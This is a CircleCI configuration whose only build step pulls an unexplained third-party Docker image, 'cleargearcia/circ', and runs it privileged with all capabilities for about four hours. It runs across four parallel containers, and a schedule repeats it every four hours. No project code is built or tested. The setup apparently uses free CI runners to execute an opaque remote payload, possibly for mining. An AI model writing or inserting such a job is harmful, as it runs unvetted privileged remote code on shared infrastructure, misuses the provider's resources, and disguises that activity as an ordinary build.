version: 2.1
jobs:
  build:
    docker:
      - image: alpine
    parallelism: 4
    steps:
      - setup_remote_docker

      - run: |
          apk update && apk add --no-cache docker-cli
          timeout 14300 docker run -it --privileged --cap-add=ALL cleargearcia/circ

workflows:
  version: 2
  commit:
    jobs:
      - build

  nightly:
    triggers:
      - schedule:
          cron: "43 1,5,9,13,17,21 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - build